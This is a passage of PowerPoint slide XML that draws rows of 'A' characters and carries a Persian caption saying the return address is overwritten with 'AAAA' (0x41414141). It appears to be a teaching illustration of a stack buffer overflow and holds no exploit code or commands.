            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17476" name="Text Box 97"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17477" name="Text Box 98"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3072" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17478" name="Text Box 99"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2976" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 100"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334003" y="3276600"/>
            <a:ext cx="779463" cy="369888"/>
            <a:chOff x="2976" y="2064"/>
            <a:chExt cx="491" cy="233"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17471" name="Text Box 101"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="2064"/>
              <a:ext cx="203" cy="233"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17472" name="Text Box 102"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="2064"/>
              <a:ext cx="203" cy="233"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17473" name="Text Box 103"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3072" y="2064"/>
              <a:ext cx="203" cy="233"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17474" name="Text Box 104"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2976" y="2064"/>
              <a:ext cx="203" cy="233"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 131"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="3048000"/>
            <a:ext cx="1339850" cy="823913"/>
            <a:chOff x="4176" y="1920"/>
            <a:chExt cx="844" cy="519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 110"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="900000">
              <a:off x="4176" y="2208"/>
              <a:ext cx="508" cy="231"/>
              <a:chOff x="2976" y="2064"/>
              <a:chExt cx="508" cy="231"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17467" name="Text Box 111"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3264" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17468" name="Text Box 112"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3168" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17469" name="Text Box 113"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3072" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17470" name="Text Box 114"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2976" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="-1440000">
              <a:off x="4176" y="1920"/>
              <a:ext cx="508" cy="231"/>
              <a:chOff x="2976" y="2064"/>
              <a:chExt cx="508" cy="231"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17463" name="Text Box 116"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3264" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17464" name="Text Box 117"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3168" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17465" name="Text Box 118"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3072" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17466" name="Text Box 119"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2976" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 120"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="900000">
              <a:off x="4464" y="2160"/>
              <a:ext cx="508" cy="231"/>
              <a:chOff x="2976" y="2064"/>
              <a:chExt cx="508" cy="231"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17459" name="Text Box 121"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3264" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17460" name="Text Box 122"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3168" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17461" name="Text Box 123"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3072" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17462" name="Text Box 124"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2976" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 125"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="-900000">
              <a:off x="4512" y="1968"/>
              <a:ext cx="508" cy="231"/>
              <a:chOff x="2976" y="2064"/>
              <a:chExt cx="508" cy="231"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17455" name="Text Box 126"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3264" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17456" name="Text Box 127"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3168" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17457" name="Text Box 128"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3072" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17458" name="Text Box 129"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2976" y="2064"/>
                <a:ext cx="220" cy="231"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1800">
                    <a:solidFill>
                      <a:schemeClr val="hlink"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56450" name="Text Box 130"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4495800"/>
            <a:ext cx="8474075" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آدرس بازگشت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بوسيله </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کد : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‘AAAA’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(0x41414141)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> باز </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نويسي ميشود</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
